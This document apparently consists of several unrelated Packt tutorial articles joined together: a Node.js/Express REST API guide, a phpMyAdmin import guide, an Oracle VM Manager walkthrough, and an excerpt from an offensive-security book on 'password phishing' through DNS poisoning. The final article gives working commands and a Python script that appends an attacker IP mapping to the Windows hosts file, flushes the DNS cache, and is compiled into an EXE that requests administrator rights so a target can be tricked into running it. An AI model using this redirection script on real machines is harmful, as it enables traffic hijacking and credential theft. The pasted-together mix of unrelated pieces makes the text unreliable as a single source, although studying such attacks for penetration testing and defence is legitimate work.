An Application Programming Interface (API) is a set of tools that a computer system makes available to give unrelated systems or software the ability to interact with it. Typically, a developer uses an API when writing software that will interact with a closed, external software system. The external software system provides the API as a standard set of tools that all developers can use. Many popular social networking sites give developers access to APIs for building tools that support those sites. The most obvious examples are Facebook and Twitter: both have robust APIs that let developers build plugins and work with data directly, without being granted full access, as a general security precaution. As you will see in this article, providing your own API is not only fairly simple, but it also empowers you to give your users access to your data. You also have the added peace of mind of knowing that you are in complete control over what level of access you grant, which sets of data you make read-only, and which data can be inserted and updated.

What is a RESTful API?

Representational State Transfer (REST) is a fancy way of saying CRUD over HTTP. When you use a REST API, you have a uniform means to create, read, and update data using simple HTTP URLs with a standard set of HTTP verbs. The most basic form of a REST API accepts one of the HTTP verbs at a URL and returns some kind of data as a response. Typically, a REST API GET request will return data such as JSON, XML, HTML, or plain text. A POST or PUT request to a RESTful API URL accepts data to create or update. The URL for a RESTful API is known as an endpoint, and while working with these endpoints it is typically said that you are consuming them. The standard HTTP verbs used while interfacing with REST APIs include:

GET: This retrieves data
POST: This submits data for a new record
PUT: This submits data to update an existing record
PATCH: This submits data to update only specific parts of an existing record
DELETE: This deletes a specific record

Typically, RESTful API endpoints are defined in a way that mimics the data models and uses semantic URLs that are somewhat representative of those models. This means that to request a list of models, for example, you would access an API endpoint of /models. Likewise, to retrieve a specific model by its ID, you would include the ID in the endpoint URL via /models/:Id.
Some sample RESTful API endpoint URLs are as follows:

GET http://myapi.com/v1/accounts: This returns a list of accounts
GET http://myapi.com/v1/accounts/1: This returns the single account with Id: 1
POST http://myapi.com/v1/accounts: This creates a new account (data submitted as part of the request)
PUT http://myapi.com/v1/accounts/1: This updates the existing account with Id: 1 (data submitted as part of the request)
GET http://myapi.com/v1/accounts/1/orders: This returns a list of orders for account Id: 1
GET http://myapi.com/v1/accounts/1/orders/21345: This returns the details of the single order with Order Id: 21345 for account Id: 1

It's not a requirement that URL endpoints match this pattern; it's just common convention.

Introducing Postman REST Client

Before we get started, there are a few tools that will make life much easier when you're working directly with APIs. The first of these tools is called Postman REST Client; it's a Google Chrome application that can run right in your browser or as a standalone packaged application. Using this tool, you can easily make any kind of request to any endpoint you want. The tool provides many useful and powerful features that are very easy to use and, best of all, free!

Installation instructions

Postman REST Client can be installed in two different ways, but both require Google Chrome to be installed and running on your system. The easiest way to install the application is by visiting the Chrome Web Store at https://chrome.google.com/webstore/category/apps. Perform a search for Postman REST Client, and multiple results will be returned. There is the regular Postman REST Client that runs as an application built into your browser, and a separate Postman REST Client (packaged app) that runs as a standalone application on your system in its own dedicated window. Go ahead and install your preference. If you install the standalone packaged app, an icon to launch it will be added to your dock or taskbar. If you installed it as a regular browser app, you can launch it by opening a new tab in Google Chrome, going to Apps, and finding the Postman REST Client icon. After you've installed and launched the app, you should be presented with an output similar to the following screenshot:

A quick tour of Postman REST Client

Using Postman REST Client, we're able to submit REST API calls to any endpoint we want, as well as modify the type of request. We then have complete access to the data that's returned from the API, as well as any errors that might have occurred. To test an API call, enter the URL of your favorite website in the Enter request URL here field and leave the dropdown next to it as GET. This mimics the standard GET request that your browser performs any time you visit a website. Click on the blue Send button. The request is made and the response is displayed in the bottom half of the screen. In the following screenshot, I sent a simple GET request to http://kroltech.com and the HTML is returned as follows:

If we change this URL to the RSS feed URL for my website, you can see the XML returned:

The XML view has a few more features, as it exposes a sidebar to the right that gives you a handy outline of the tree structure of the XML data. Not only that, you can now see a history of the requests we've made so far along the left sidebar. This is great when we're doing more advanced POST or PUT requests and don't want to repeat the data setup for each request while testing an endpoint.
Here is a sample API endpoint I submitted a GET request to, which returns JSON data in its response:

A really nice thing about making API calls to endpoints that return JSON using Postman Client is that it parses and displays the JSON in a nicely formatted way, and each node in the data is expandable and collapsible. The app is very intuitive, so make sure you spend some time playing around and experimenting with different types of calls to different URLs.

Using the JSONView Chrome extension

There is one other tool I want to let you know about that, while extremely minor, is actually a really big deal. The JSONView Chrome extension is a very small plugin that will instantly convert any JSON you view directly in the browser into a more usable JSON tree (exactly like Postman Client). Here is an example of pointing to a URL that returns JSON from Chrome before JSONView is installed:

And here is that same URL after JSONView has been installed:

You should install the JSONView Google Chrome extension the same way you installed Postman REST Client: access the Chrome Web Store and perform a search for JSONView. Now that you have the tools to easily work with and test API endpoints, let's take a look at writing your own and handling the different request types.

Creating a basic API server

Let's create a super basic Node.js server using Express that we'll use to create our own API. Then, we can send tests to the API using Postman REST Client to see how it all works. In a new project workspace, first install the npm modules that we're going to need in order to get our server up and running:

$ npm init
$ npm install --save express body-parser underscore

Now that the package.json file for this project has been initialized and the modules installed, let's create a basic server file to bootstrap an Express server. Create a file named server.js and insert the following block of code:

var express = require('express'),
    bodyParser = require('body-parser'),
    _ = require('underscore'),
    json = require('./movies.json'),
    app = express();

app.set('port', process.env.PORT || 3500);

app.use(bodyParser.urlencoded());
app.use(bodyParser.json());

var router = new express.Router();
// TO DO: Setup endpoints ...
app.use('/', router);

var server = app.listen(app.get('port'), function() {
    console.log('Server up: http://localhost:' + app.get('port'));
});

Most of this should look familiar to you. In the server.js file, we require the express, body-parser, and underscore modules. We also require a file named movies.json, which we'll create next. After our modules are required, we set up the standard configuration for an Express server with the minimum amount of configuration needed to support an API server. Notice that we didn't set up Handlebars as a view-rendering engine, because we aren't going to render any HTML with this server, just pure JSON responses.
Creating sample JSON data

Let's create the sample movies.json file that will act as our temporary data store (even though the API we build for the purposes of this demonstration won't actually persist data beyond the app's life cycle):

[{
    "Id": "1",
    "Title": "Aliens",
    "Director": "James Cameron",
    "Year": "1986",
    "Rating": "8.5"
}, {
    "Id": "2",
    "Title": "Big Trouble in Little China",
    "Director": "John Carpenter",
    "Year": "1986",
    "Rating": "7.3"
}, {
    "Id": "3",
    "Title": "Killer Klowns from Outer Space",
    "Director": "Stephen Chiodo",
    "Year": "1988",
    "Rating": "6.0"
}, {
    "Id": "4",
    "Title": "Heat",
    "Director": "Michael Mann",
    "Year": "1995",
    "Rating": "8.3"
}, {
    "Id": "5",
    "Title": "The Raid: Redemption",
    "Director": "Gareth Evans",
    "Year": "2011",
    "Rating": "7.6"
}]

This is just a really simple JSON list of a few of my favorite movies. Feel free to populate it with whatever you like. Boot up the server to make sure you aren't getting any errors (note that we haven't set up any routes yet, so it won't actually do anything if you try to load it in a browser):

$ node server.js
Server up: http://localhost:3500

Responding to GET requests

Adding simple GET request support is fairly straightforward, and you've seen this before in the app we built. Here is some sample code that responds to a GET request and returns a simple JavaScript object as JSON. Insert the following code in the routes section, where we left the // TO DO: Setup endpoints ... comment waiting:

router.get('/test', function(req, res) {
    var data = {
        name: 'Jason Krol',
        website: 'http://kroltech.com'
    };

    res.json(data);
});

Let's tweak the function a little bit and change it so that it responds to a GET request against the root URL (that is, /) route and returns the JSON data from our movies file. Add this new route after the /test route added previously:

router.get('/', function(req, res) {
    res.json(json);
});

The res (response) object in Express has a few different methods for sending data back to the browser. Each of these ultimately falls back on the base send method, which includes header information, statusCodes, and so on. res.json and res.jsonp will automatically format JavaScript objects into JSON and then send them using res.send. res.render will render a template view as a string and then send it using res.send as well. With that code in place, if we launch the server.js file, the server will be listening for GET requests to the / URL route and will respond with the JSON data of our movies collection. Let's first test it out using the Postman REST Client tool:

GET requests are nice because we could have just as easily pulled that same URL up in our browser and received the same result:

However, we're going to use Postman for the remainder of our endpoint testing, as it's a little more difficult to send POST and PUT requests using a browser.

Receiving data – POST and PUT requests

When we want to allow the users of our API to insert or update data, we need to accept requests with different HTTP verbs. When inserting new data, the POST verb is the preferred method to accept data and know that it's meant for an insert. Let's take a look at code that accepts a POST request along with data, inserts a record into our collection, and returns the updated JSON.
Insert the following block of code after the route you added previously for GET:

router.post('/', function(req, res) {
    // insert the new item into the collection (validate first)
    if(req.body.Id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {
        json.push(req.body);
        res.json(json);
    } else {
        res.json(500, { error: 'There was an error!' });
    }
});

You can see that the first thing we do in the POST function is check that the required fields were submitted along with the actual request. Assuming our data checks out and all the required fields are accounted for (in our case, every field), we insert the entire req.body object into the array as-is using the array's push function. If any of the required fields aren't submitted with the request, we return a 500 error message instead. Let's submit a POST request this time to the same endpoint using Postman REST Client. (Don't forget to make sure your API server is running with node server.js.)

First, we submitted a POST request with no data, so you can clearly see the 500 error response that was returned. Next, we provided the actual data using the x-www-form-urlencoded option in Postman, filling in each of the name/value pairs with some new custom data. You can see from the results that the STATUS was 200, which is a success, and the updated JSON data was returned as a result. Reloading the main GET endpoint in a browser yields our original movies collection with the new one added.

PUT requests work in almost exactly the same way, except that, traditionally, the Id property of the data is handled a little differently. In our example, we are going to require the Id attribute as part of the URL and not accept it as a parameter in the submitted data (since it's not common for an update function to change the actual Id of the object it's updating). Insert the following code for the PUT route after the existing POST route you added earlier:

router.put('/:id', function(req, res) {
    // update the item in the collection
    if(req.params.id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {
        _.each(json, function(elem, index) {
            // find and update:
            if (elem.Id === req.params.id) {
                elem.Title = req.body.Title;
                elem.Director = req.body.Director;
                elem.Year = req.body.Year;
                elem.Rating = req.body.Rating;
            }
        });

        res.json(json);
    } else {
        res.json(500, { error: 'There was an error!' });
    }
});

This code again validates that the required fields are included with the data submitted along with the request. Then, it performs an _.each loop (using the underscore module) to look through the collection of movies and find the one whose Id parameter matches the Id included in the URL. Assuming there's a match, the individual fields of the matched object are updated with the new values sent with the request. Once the loop is complete, the updated JSON data is sent back as the response. As with the POST request, if any of the required fields are missing, a simple 500 error message is returned. The following screenshot demonstrates a successful PUT request updating an existing record.
The response from Postman after including the value 1 in the URL as the Id parameter, which provides the individual fields to update as x-www-form-urlencoded values, and finally sending as PUT shows that the original item in our movies collection is now the original Alien (not Aliens, its sequel as we originally had). Removing data – DELETE The final stop on our whirlwind tour of the different REST API HTTP verbs is DELETE. It should be no surprise that sending a DELETE request should do exactly what it sounds like. Let's add another route that accepts DELETE requests and will delete an item from our movies collection. Here is the code that takes care of DELETE requests that should be placed after the existing block of code from the previous PUT: router.delete('/:id', function(req, res) {    var indexToDel = -1;    _.each(json, function(elem, index) {        if (elem.Id === req.params.id) {            indexToDel = index;        }    });    if (~indexToDel) {        json.splice(indexToDel, 1);    }    res.json(json); }); This code will loop through the collection of movies and find a matching item by comparing the values of Id. If a match is found, the array index for the matched item is held until the loop is finished. Using the array.splice function, we can remove an array item at a specific index. Once the data has been updated by removing the requested item, the JSON data is returned. Notice in the following screenshot that the updated JSON that's returned is in fact no longer displaying the original second item we deleted. Note that ~ in there! That's a little bit of JavaScript black magic! The tilde (~) in JavaScript will bit flip a value. In other words, take a value and return the negative of that value incremented by one, that is ~n === -(n+1). Typically, the tilde is used with functions that return -1 as a false response. By using ~ on -1, you are converting it to a 0. If you were to perform a Boolean check on -1 in JavaScript, it would return true. You will see ~ is used primarily with the indexOf function and jQuery's $.inArray()—both return -1 as a false response. All of the endpoints defined in this article are extremely rudimentary, and most of these should never ever see the light of day in a production environment! Whenever you have an API that accepts anything other than GET requests, you need to be sure to enforce extremely strict validation and authentication rules. After all, you are basically giving your users direct access to your data. Consuming external APIs from Node.js There will undoubtedly be a time when you want to consume an API directly from within your Node.js code. Perhaps, your own API endpoint needs to first fetch data from some other unrelated third-party API before sending a response. Whatever the reason, the act of sending a request to an external API endpoint and receiving a response can be done fairly easily using a popular and well-known npm module called Request. Request was written by Mikeal Rogers and is currently the third most popular and (most relied upon) npm module after async and underscore. Request is basically a super simple HTTP client, so everything you've been doing with Postman REST Client so far is basically what Request can do, only the resulting data is available to you in your node code as well as the response status codes and/or errors, if any. Consuming an API endpoint using Request Let's do a neat trick and actually consume our own endpoint as if it was some third-party external API. 
First, we need to ensure we have Request installed and can include it in our app: $ npm install --save request Next, edit server.js and make sure you include Request as a required module at the start of the file: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'),    json = require('./movies.json'),    app = express(),    request = require('request'); Now let's add a new endpoint after our existing routes, which will be an endpoint accessible in our server via a GET request to /external-api. This endpoint, however, will actually consume another endpoint on another server, but for the purposes of this example, that other server is actually the same server we're currently running! The Request module accepts an options object with a number of different parameters and settings, but for this particular example, we only care about a few. We're going to pass an object that has a setting for the method (GET, POST, PUT, and so on) and the URL of the endpoint we want to consume. After the request is made and a response is received, we want an inline callback function to execute. Place the following block of code after your existing list of routes in server.js: router.get('/external-api', function(req, res) {    request({            method: 'GET',            uri: 'http://localhost:' + (process.env.PORT || 3500),        }, function(error, response, body) {             if (error) { throw error; }              var movies = [];            _.each(JSON.parse(body), function(elem, index) {                movies.push({                    Title: elem.Title,                    Rating: elem.Rating                });            });            res.json(_.sortBy(movies, 'Rating').reverse());        }); }); The callback function accepts three parameters: error, response, and body. The response object is like any other response that Express handles and has all of the various parameters as such. The third parameter, body, is what we're really interested in. That will contain the actual result of the request to the endpoint that we called. In this case, it is the JSON data from our main GET route we defined earlier that returns our own list of movies. It's important to note that the data returned from the request is returned as a string. We need to use JSON.parse to convert that string to actual usable JSON data. Using the data that came back from the request, we transform it a little bit. That is, we take that data and manipulate it a bit to suit our needs. In this example, we took the master list of movies and just returned a new collection that consists of only the title and rating of each movie and then sorts the results by the top scores. Load this new endpoint by pointing your browser to http://localhost:3500/external-api, and you can see the new transformed JSON output to the screen. Let's take a look at another example that's a little more real world. Let's say that we want to display a list of similar movies for each one in our collection, but we want to look up that data somewhere such as www.imdb.com. Here is the sample code that will send a GET request to IMDB's JSON API, specifically for the word aliens, and returns a list of related movies by the title and year. 
Go ahead and place this block of code after the previous route for external-api: router.get('/imdb', function(req, res) {    request({            method: 'GET',            uri: 'http://sg.media-imdb.com/suggests/a/aliens.json',        }, function(err, response, body) {            var data = body.substring(body.indexOf('(')+1);            data = JSON.parse(data.substring(0,data.length-1));            var related = [];            _.each(data.d, function(movie, index) {                related.push({                    Title: movie.l,                    Year: movie.y,                    Poster: movie.i ? movie.i[0] : ''                });            });              res.json(related);        }); }); If we take a look at this new endpoint in a browser, we can see the JSON data that's returned from our /imdb endpoint is actually itself retrieving and returning data from some other API endpoint: Note that the JSON endpoint I'm using for IMDB isn't actually from their API, but rather what they use on their homepage when you type in the main search box. This would not really be the most appropriate way to use their data, but it's more of a hack to show this example. In reality, to use their API (like most other APIs), you would need to register and get an API key that you would use so that they can properly track how much data you are requesting on a daily or an hourly basis. Most APIs will to require you to use a private key with them for this same reason. Summary In this article, we took a brief look at how APIs work in general, the RESTful API approach to semantic URL paths and arguments, and created a bare bones API. We used Postman REST Client to interact with the API by consuming endpoints and testing the different types of request methods (GET, POST, PUT, and so on). You also learned how to consume an external API endpoint by using the third-party node module Request. Resources for Article: Further resources on this subject: RESTful Services JAX-RS 2.0 [Article] REST – Where It Begins [Article] RESTful Web Services – Server-Sent Events (SSE) [Article]

Importing Structure and Data Using phpMyAdmin

Packt
12 Oct 2009
9 min read
A feature was added in version 2.11.0: an import file may contain the DELIMITER keyword. This enables phpMyAdmin to mimic the mysql command-line interpreter. The DELIMITER separator is used to delineate the part of the file containing a stored procedure, as these procedures can themselves contain semicolons. The default values for the Import interface are defined in $cfg['Import']. Before examining the actual import dialog, let's discuss some limits issues. Limits for the transfer When we import, the source file is usually on our client machine; so, it must travel to the server via HTTP. This transfer takes time and uses resources that may be limited in the web server's PHP configuration. Instead of using HTTP, we can upload our file to the server using a protocol such as FTP, as described in the Web Server Upload Directories section. This method circumvents the web server's PHP upload limits. Time limits First, let's consider the time limit. In config.inc.php, the $cfg['ExecTimeLimit'] configuration directive assigns, by default, a maximum execution time of 300 seconds (five minutes) for any phpMyAdmin script, including the scripts that process data after the file has been uploaded. A value of 0 removes the limit, and in theory, gives us infinite time to complete the import operation. If the PHP server is running in safe mode, modifying $cfg['ExecTimeLimit'] will have no effect. This is because the limits set in php.ini or in user-related web server configuration file (such as .htaccess or virtual host configuration files) take precedence over this parameter. Of course, the time it effectively takes, depends on two key factors: Web server load MySQL server load The time taken by the file, as it travels between the client and the server,does not count as execution time because the PHP script starts to execute only once the file has been received on the server. Therefore, the $cfg['ExecTimeLimit'] parameter has an impact only on the time used to process data (like decompression or sending it to the MySQL server). Other limits The system administrator can use the php.ini file or the web server's virtual host configuration file to control uploads on the server. The upload_max_filesize parameter specifies the upper limit or the maximum file size that can be uploaded via HTTP. This one is obvious, but another less obvious parameter is post_max_size. As HTTP uploading is done via the POST method, this parameter may limit our transfers. For more details about the POST method, please refer to http://en.wikipedia.org/wiki/Http#Request_methods. The memory_limit parameter is provided to avoid web server child processes from grabbing too much of the server memory—phpMyAdmin also runs as a child process. Thus, the handling of normal file uploads, especially compressed dumps, can be compromised by giving this parameter a small value. Here, no preferred value can be recommended; the value depends on the size of uploaded data. The memory limit can also be tuned via the $cfg['MemoryLimit'] parameter in config.inc.php. Finally, file uploads must be allowed by setting file_uploads to On. Otherwise, phpMyAdmin won't even show the Location of the textfile dialog. It would be useless to display this dialog, as the connection would be refused later by the PHP component of the web server. Partial imports If the file is too big, there are ways in which we can resolve the situation. 
If we still have access to the original data, we could use phpMyAdmin to generate smaller CSV export files, choosing the Dump n rows starting at record # n dialog. If this were not possible, we will have to use a text editor to split the file into smaller sections. Another possibility is to use the upload directory mechanism, which accesses the directory defined in $cfg['UploadDir']. This feature is explained later in this article. In recent phpMyAdmin versions, the Partial import feature can also solve this file size problem. By selecting the Allow interrupt… checkbox, the import process will interrupt itself if it detects that it is close to the time limit. We can also specify a number of queries to skip from the start, in case we successfully import a number of rows and wish to continue from that point. Temporary directory On some servers, a security feature called open_basedir can be set up in a way that impedes the upload mechanism. In this case, or for any other reason, when uploads are problematic, the $cfg['TempDir'] parameter can be set with the value of a temporary directory. This is probably a subdirectory of phpMyAdmin's main directory, into which the web server is allowed to put the uploaded file. Importing SQL files Any file containing MySQL statements can be imported via this mechanism. The dialog is available in the Database view or the Table view, via the Import subpage, or in the Query window. There is no relation between the currently selected table (here author) and the actual contents of the SQL file that will be imported. All the contents of the SQL file will be imported, and it is those contents that determine which tables or databases are affected. However, if the imported file does not contain any SQL statements to select a database, all statements in the imported file will be executed on the currently selected database. Let's try an import exercise. First, we make sure that we have a current SQL export of the book table. This export file must contain the structure and the data. Then we drop the book table—yes, really! We could also simply rename it. Now it is time to import the file back. We should be on the Import subpage, where we can see the Location of the text file dialog. We just have to hit the Browse button and choose our file. phpMyAdmin is able to detect which compression method (if any) has been applied to the file. Depending on the phpMyAdmin version, and the extensions that are available in the PHP component of the web server, there is variation in the formats that the program can decompress. However, to import successfully, phpMyAdmin must be informed of the character set of the file to be imported. The default value is utf8. However, if we know that the import file was created with another character set, we should specify it here. An SQL compatibility mode selector is available at import time. This mode should be adjusted to match the actual data that we are about to import, according to the type of the server where the data was previously exported. To start the import, we click Go. The import procedure continues and we receive a message: Import has been successfully finished, 2 queries executed. We can browse our newly-created tables to confirm the success of the import operation. The file could be imported for testing in a different database or even in a MySQL server. Importing CSV files In this section, we will examine how to import CSV files. There are two possible methods—CSV and CSV using LOAD DATA. 
The first method is implemented internally by phpMyAdmin and is the recommended one for its simplicity. With the second method, phpMyAdmin receives the file to be loaded, and passes it to MySQL. In theory, this method should be faster. However, it has more requirements due to MySQL itself (see the Requirements sub-section of the CSV using LOAD DATA section).

Differences between SQL and CSV formats
There are some differences between these two formats. The CSV file format contains data only, so we must already have an existing table in place. This table does not need to have the same structure as the original table (from which the data comes); the Column names dialog enables us to choose which columns are affected in the target table. Because the table must exist prior to the import, the CSV import dialog is available only from the Import subpage in the Table view, and not in the Database view.

Exporting a test file
Before trying an import, let's generate an author.csv export file from the author table. We use the default values in the CSV export options. We can then Empty the author table—we should avoid dropping this table because we still need the table structure.

CSV
From the author table menu, we select Import and then CSV. We can influence the behavior of the import in a number of ways. By default, importing does not modify existing data (based on primary or unique keys). However, the Replace table data with file option instructs phpMyAdmin to use REPLACE statements instead of INSERT statements, so that existing rows are replaced with the imported data. Using Ignore duplicate rows, INSERT IGNORE statements are generated. These cause MySQL to ignore any duplicate key problems during insertion. A duplicate key from the import file does not replace existing data, and the procedure continues for the next line of CSV data.

We can then specify the character that terminates each field, the character that encloses data, and the character that escapes the enclosing character. Usually this is the backslash (\). For example, for a double quote enclosing character, if the data field contains a double quote, it must be expressed as "some data \" some other data". For Lines terminated by, recent versions of phpMyAdmin offer the auto choice, which should be tried first as it detects the end-of-line character automatically. We can also specify manually which characters terminate the lines. The usual choice is \n for UNIX-based systems, \r\n for DOS or Windows systems, and \r for Mac-based systems (up to Mac OS 9). If in doubt, we can use a hexadecimal file editor on our client computer (not part of phpMyAdmin) to examine the exact codes.

By default, phpMyAdmin expects a CSV file with the same number of fields and the same field order as the target table. But this can be changed by entering a comma-separated list of column names in Column names, respecting the source file format. For example, let's say our source file contains only the author ID and the author name information:

"1","John Smith"
"2","Maria Sunshine"

We'd have to put id, name in Column names to match the source file. When we click Go, the import is executed and we get a confirmation. We might also see the actual INSERT queries generated if the total size of the file is not too big:

Import has been successfully finished, 2 queries executed.
INSERT INTO `author` VALUES ('1', 'John Smith', '+01 445 789-1234')
# 1 row(s) affected.
INSERT INTO `author` VALUES ('2', 'Maria Sunshine', '333-3333')
# 1 row(s) affected.
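For comparison, the CSV using LOAD DATA method does not generate INSERT statements at all; instead, phpMyAdmin hands the file to MySQL with a LOAD DATA statement. The following is only a rough sketch of such a statement for the author table used above. The exact clauses depend on the options chosen in the dialog and on whether LOCAL is permitted by the server, and the column names are assumed from the sample INSERT queries, so treat it as an illustration rather than phpMyAdmin's exact output:

-- illustrative only: the column list (id, name, phone) is assumed from the sample data
LOAD DATA LOCAL INFILE 'author.csv'
INTO TABLE author
FIELDS TERMINATED BY ',' ENCLOSED BY '"' ESCAPED BY '\\'
LINES TERMINATED BY '\n'
(id, name, phone);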

Oracle VM Management

Packt
16 Oct 2009
6 min read
Before we get to manage the VMs in the Oracle VM Manager, let's take a quick look at the Oracle VM Manager by logging into it. Getting started with Oracle VM Manager In this article, we will perform the following actions while exploring the Oracle VM Manager: Registering an account Logging in to Oracle VM Manager Create a Server Pool After we are done with the Oracle VM Manager installation, we will use one of the following links to log on to the Oracle VM Manager: Within the local machine: http://127.0.0.1:8888/OVS Logging in remotely: http://vmmgr:8888/OVS Here, vmmgr refers to the host name or IP address of your Oracle VM Manager host. How to register an account Registering of an account can be done in several ways. If, during the installation of Oracle VM Manager, we have chosen to configure the default admin account "admin", then we can use this account directly to log on to Oracle's IntraCloud portal we call Oracle VM Manager. We will explain later in detail about the user accounts and why we would need separate accounts for separate roles for fine-grained access control; something that is crucial for security purposes. So let's have a quick look at the three available options: Default installation: This option applies if we have performed the default installation ourselves and have gone ahead to create the account ourselves. Here we have the default administrator role. Request for account creation: Contacting the administrator of Oracle VM Manager is another way to attain an account with the privileges, such as administrator, manager, and user. Create yourself: If we need to conduct basic functions of a common user with operator's role such as creating and using virtual machines, or importing resources, we can create a new account ourselves. However, we will need the administrator to assign us the server pools and groups to our account before we can get started. Here by default we are granted a user role. We will talk more about roles later in this article. Now let's go about registering a new account with Oracle VM Manager. Once on the Oracle VM Manager Login page click on the Register link. We are presented with the following screen. We must enter a Username of our choice and a hard-to-crack password twice. Also, we have to fill in our First Name and Last Name and complete the registration with a valid email address. Click Next: Next, we need to confirm our account details by clicking on the Confirm button. Now our account will be created and a confirmation message is displayed on the Oracle VM Manager Login screen. It should be noted that we will need some Server Pools and groups before we can get started. We will have to ask the administrator to assign us access to those pools and groups. It's time now to login to our newly created account. Logging in to Oracle VM Manager Again we will need to either access the URL locally by typing http://127.0.0.1:8888/OVS or by typing the following: http://hostname:8888/ OVS. If we are accessing the Oracle VM Manager Portal remotely, replace the "hostname" with either the FQDN (Fully Qualified Distinguished Name) if the machine is registered in our DNS or just the hostname of the VM Manager machine. We can login to the portal by simply typing in our Username and Password that we just created. Depending on the role and the server pools that we have been assigned, we will be displayed with the tabs upon the screen as shown in the following table. To change the role, we will need to contact our enterprise domain administrator. 
Only administrators are allowed to change the roles of accounts. If we forget our password, we can click on Forgot Password and on submitting our account name, the password will be sent to the registered email address that we had provided when we registered the account. The following table discusses the assigned tabs that are displayed for each Oracle VM Manager roles:   Role Grants User Virtual Machines, Resources Administrator Virtual Machines, Resources, Servers, Server Pools, Administration Manager Virtual Machines, Resources, Servers, Server Pools   We can obviously change the roles by editing the Profile (on the upper-right section of the portal). As it can be seen in the following screenshot, we have access to the Virtual Machines pane and the Resources pane. We will continue to add Servers to the pool when logged in as admin. Oracle VM management: Managing Server Pool A Server Pool is logically an autonomous region that contains one or more physical servers and the dynamic nature of such pool and pools of pools makes what we call  an infinite Cloud infrastructure. Currently Oracle has its Cloud portal with Amazon but it is very much viable to have an IntraCloud portal or private Cloud where we can run all sorts of Linux and Windows flavors on our Cloud backbone. It eventually rests on the array of SAN, NAS, or other next generation storage substrate on which the VMs reside. We must ensure that we have the following prerequisites properly checked before creating the Virtual Machines on our IntraCloud Oracle VM. Oracle VM Servers: These are available to deploy as Utility Master, Server Master pool, and Virtual Machine Servers. Repositories: Used for Live Migration or Hot Migration of the VMs and for local storage on the Oracle VM Servers. FQDN/IP address of Oracle VM Servers: It is better to have the Oracle VM Servers known as OracleVM01.AVASTU.COM and OracleVM02.AVASTU. COM. This way you don't have to bother about the IP changes or infrastructural relocation of the IntraCloud to another location. Oracle VM Agent passwords: Needed to access the Oracle VM Servers. Let's now go about exploring the designing process of the Oracle VM. Then we will do the following systematically: Creating the Server Pool Editing Server Pool information Search and retrieval within Server Pool Restoring Server Pool Enabling HA Deleting a Server Pool However, we can carry out these actions only as a Manager or an Administrator. But first let's take a look at the decisions on what type of Server Pools will suit us the best and what the architectural considerations could be around building your Oracle VM farm.

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details. Hackers or attackers lure customers into sharing their personal details by sending them e-mails that appear to come from popular organizations. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, corrupt Domain Name System (DNS) data is injected into the DNS resolver's cache. This causes the name server to return an incorrect result record, which can result in traffic being directed to the attacker's computer. This article is an excerpt taken from Python For Offensive PenTest, written by Hussam Khrais.

Password phishing – DNS poisoning
One of the easiest ways to manipulate the direction of traffic remotely is to play with DNS records. Each operating system contains a hosts file in order to statically map hostnames to specific IP addresses. The hosts file is a plain text file, which can easily be rewritten as long as we have admin privileges. For now, let's have a quick look at the hosts file in the Windows operating system, where it is located under C:\Windows\System32\drivers\etc. If you read the description at the top of the file, you will see that each entry should be located on a separate line, with the IP address placed first and, after at least one space, the hostname following it.

Now, let's see the traffic at the packet level:

Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: we have an IP address of 10.10.10.100, which is the IP address of our attacker, so we can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system will do a DNS lookup behind the scenes and we will get the real IP address.

Now, notice what happens after DNS poisoning. For this, close all the windows except the one where Wireshark is running. Keep in mind that we need admin rights to modify the hosts file; even when logged in as an admin, you should explicitly right-click the application and choose to run it as administrator. Navigate to the directory where the hosts file is located, execute dir, and you will see the hosts file. Run type hosts to view its original contents. Now, we will enter the following command:

echo 10.10.10.100 www.google.jo >> hosts

Here, 10.10.10.100 is the IP address of our Kali machine, so once the target goes to google.jo, it should be redirected to the attacker machine. Once again, verify the change by executing type hosts. After modifying the DNS mapping, it's always a good idea to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command:

ipconfig /flushdns

Now, watch what happens after DNS poisoning. We will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that in Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capture and recover the original hosts file, placing it back in the drivers\etc folder.
Now, let's flush the poisoned DNS cache first by running:

ipconfig /flushdns

Then, open the browser again; https://www.google.jo/?gws_rd=ssl should load normally now. Now we are good to go!

Using a Python script
Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code:

# Python For Offensive PenTest
# DNS_Poisoning

import subprocess
import os

# change the working directory to ...\drivers\etc, where the hosts file is located on Windows
os.chdir("C:\\Windows\\System32\\drivers\\etc")

# append this line to the hosts file; it redirects traffic
# going to www.google.jo to the IP 10.10.10.100
command = "echo 10.10.10.100 www.google.jo >> hosts"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

# flush the cached DNS, to make sure that new sessions will take the new DNS record
command = "ipconfig /flushdns"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

The first thing we do is change our current working directory to the one containing the hosts file, using the os library. Then, using subprocess, we append a static DNS record, pointing www.google.jo to 10.10.10.100: the Kali IP address. In the last step, we flush the DNS cache. We can now save the file and export the script as an EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for py2exe, we add a new line, as follows:

...
windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}],
...

So, we have added a new option specifying that when the target executes the EXE file, it will ask to elevate its privileges to admin. Let's run the setup file and start a new capture. Now, copy the EXE file onto the desktop. Notice that it shows a little shield, indicating that this file needs admin privileges, which gives us exactly the effect of running as admin. Now, let's run the file and verify that the hosts file gets modified; you will see that our line has been added. Now, open a new session and we will see whether we get the redirection. So, let's start a new capture and open Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100.

We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples.

12 common malware types you should know
Getting started with Digital forensics using Autopsy
5 pen testing rules of engagement: What to consider while performing Penetration testing
